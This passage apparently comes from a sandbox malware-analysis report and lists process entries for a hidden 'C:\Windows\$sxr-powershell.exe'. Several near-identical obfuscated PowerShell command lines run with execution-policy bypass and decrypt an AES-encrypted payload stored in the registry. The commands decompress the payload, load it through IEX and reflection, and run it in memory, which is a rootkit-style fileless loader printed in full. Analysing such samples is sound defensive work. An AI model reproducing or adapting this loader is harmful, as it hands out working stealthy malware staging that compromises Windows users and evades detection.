$OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:9260
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:9404
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:4424
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:9792
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = 